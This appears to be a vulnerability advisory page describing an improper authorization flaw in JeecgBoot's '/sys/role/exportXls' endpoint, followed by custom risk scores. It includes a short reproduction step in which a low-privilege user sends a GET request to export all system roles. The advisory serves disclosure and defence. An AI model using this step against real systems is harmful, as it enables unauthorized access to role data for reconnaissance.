Primary

Context

JeecgBoot Improper Authorization Vulnerability in Role Export Function

Vulnerability

A vulnerability allowing improper authorization has been identified in JeecgBoot versions through 3.8.2. The issue resides in the '/sys/role/exportXls' endpoint, which can be accessed remotely without proper authorization checks. This vulnerability allows authenticated users to export all system roles, including sensitive details such as role names, codes, and descriptions.

Impact

Exploitation of this vulnerability enables unauthorized role data access, which could be used for information gathering, privilege escalation, or security reconnaissance.

Reproduction

To reproduce this vulnerability, authenticate as a user with low privileges and send a GET request to the '/sys/role/exportXls' endpoint. The response will include an Excel file containing all system roles.

Added: Sep 25, 2025, 11:19 PM

Updated: Sep 25, 2025, 11:19 PM

Vulnerability Rating

Custom Algorithm

spread

0.8

impact

2.5

exploitability

6.6

remediation

0.0

relevance

0.6

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.8

impact

2.5

exploitability

6.6

remediation

0.0

relevance

0.6

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

JeecgBoot Improper Authorization Vulnerability in Role Export Function

Vulnerability

Impact

Reproduction

Affected Products

JeecgBoot

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating